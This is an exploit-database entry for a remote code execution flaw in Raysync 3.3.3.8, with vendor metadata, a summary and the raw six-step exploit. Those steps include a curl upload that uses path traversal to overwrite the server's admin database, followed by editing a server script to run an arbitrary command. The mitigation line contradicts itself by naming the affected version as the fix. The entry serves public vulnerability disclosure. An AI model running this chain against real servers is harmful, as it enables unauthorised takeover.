Raysync 3.3.3.8 - RCE - exploit.company

vendor:

Raysync

by:

XiaoLong Zhu

9.8

CVSS

HIGH

Remote Code Execution

CWE

Product Name: Raysync

Affected Version From: Below 3.3.3.8

Affected Version To: 3.3.3.8

Patch Exists: YES

Related CWE: N/A

CPE: a:raysync:raysync

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Linux

2020

Raysync 3.3.3.8 – RCE

Raysync 3.3.3.8 is vulnerable to Remote Code Execution. An attacker can exploit this vulnerability by running RaysyncServer.sh to build a web application on the local environment, setting the admin password to 123456, which will be written to manage.db file. The attacker can then use curl to override the remote manage.db file in the server. After logging in to the admin portal with admin/123456, the attacker can create a normal file with all permissions in scope and modify RaySyncServer.sh to add arbitrary evil command. Finally, the attacker can trigger the RCE by clicking the 'reset' button.

Mitigation:

Users should update to the latest version of Raysync 3.3.3.8 to patch this vulnerability.

Source

Exploit-DB raw data:

# Exploit Title: Raysync 3.3.3.8 - RCE
# Date: 04/10/2020
# Exploit Author: XiaoLong Zhu
# Vendor Homepage: www.raysync.io
# Version: below 3.3.3.8
# Tested on: Linux

step1: run RaysyncServer.sh to build a web application on the local

environment, set admin password to 123456 , which will be write to

manage.db file.

step2: curl "file=@manage.db" http://[raysync
ip]/avatar?account=1&UserId=/../../../../config/manager.db

to override remote manage.db file in server.

step3: login in admin portal with admin/123456.

step4: create a normal file with all permissions in scope.

step5: modify RaySyncServer.sh ,add arbitrary evil command.

step6: trigger rce with clicking "reset" button